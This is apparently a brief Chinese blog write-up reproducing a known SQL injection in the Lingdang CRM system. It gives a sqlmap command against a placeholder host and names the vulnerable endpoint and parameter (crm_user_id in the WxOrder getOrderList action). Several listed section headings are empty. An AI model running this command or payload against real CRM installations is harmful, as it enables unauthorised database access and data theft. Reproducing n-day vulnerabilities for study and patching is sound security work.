文章目录
概要
灵当CRM系统sql注入漏洞:
具体实例:
技术名词解释
小结
概要
近期灵当CRM系统爆出sql注入漏洞,我们来进行nday复现。
灵当CRM系统sql注入漏洞:
Python sqlmap.py -u
"http://0.0.0.0:0000/crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1 "

得到pyload:
module=WxOrder&action=getOrderList&crm_user_id=1